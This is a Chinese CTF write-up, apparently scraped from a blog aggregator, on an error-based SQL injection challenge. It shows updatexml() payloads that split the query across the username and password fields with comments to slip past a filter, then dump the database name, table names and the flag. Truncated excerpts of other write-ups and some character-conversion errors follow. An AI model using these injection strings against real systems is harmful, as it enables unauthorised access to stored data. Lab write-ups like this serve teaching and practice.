CTF實驗吧加了料的報錯注入

2021-09-25 21:11:01 字數 2178 閱讀 8111

實驗吧位址

f12審查元素發現原始碼中的提示是這樣一整句的查詢

基本確定此題為乙個sql注入

/# = union select等這幾個都是報錯『sql injection detected』說明都被過濾了

利用報錯函式updatexml嘗試發現是在password處進行了過濾 但是username處沒有過濾,,,判斷完畢

我們再了解一下updatexml()函式

1	updatexml (xml_document, xpath_string, new_value);

第乙個引數:xml_document是string格式,為xml文件物件的名稱,文中為doc

第二個引數:xpath_string (xpath格式的字串) ,如果不了解xpath語法,可以在網上查詢教程。

第三個引數:new_value,string格式,替換查詢到的符合條件的資料

作用:改變文件中符合條件的節點的值

改變xml_document中符合xpath_string的值

而我們的注入語句為:

1 updatexml(1,concat(0x7e,(select @@version),0x7e),1)

其中的concat()函式是將其連成乙個字串,因此不會符合xpath_string的格式,從而出現格式錯誤,爆出

?1 error 1105 (hy000): xpath syntax error: ':root@localhost'

開始嘗試注入

暴庫username=1' or 1<>2 or updatexml /*&password=*/ (1,concat(0x7e,(select database()),0x7e),1) or '

爆表username=1' or updatexml /*&password=*/(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where !(table_schema<>'error_based_hpf')),0x7e),1) or '

繼續爆列 、爆欄位

得到flag

xpath syntax error: 『|flag|』

實驗吧 加了料的報錯注入

前言 不得不說這一題對我來說挺有難度的,以前沒有遇到過。看了別人的writeup過後,也想要記錄一下,給自己攢攢經驗 這題的解法有兩種 2 exp 報錯注入 hpf注入 檢視原始碼 就是要提交post資料,我直接在burpsuite裡面操作。隨便輸入兩個引數,頁面提示login failed。根據原...

加了料的報錯注入 實驗吧

題目直接告訴了我們注入點存在於我們post進去的兩個變數,即username和password當中,f12檢視原始碼後得到提示,sql語句是以單引號的方式進行閉合的後進行注入測試。首先對username進行注入,經過初步測試對 進行了過濾,採用 進行繞過。顯示雖然waf被繞過username中依舊存...

實驗吧 加了料的報錯注入

頁面提示我們postusername與password兩個引數,看了看原始碼,裡面提示了我們sql語句 sql select from users where username username and password password 先隨手post幾個數試試,發現頁面返回有四種形式,當輸入ad...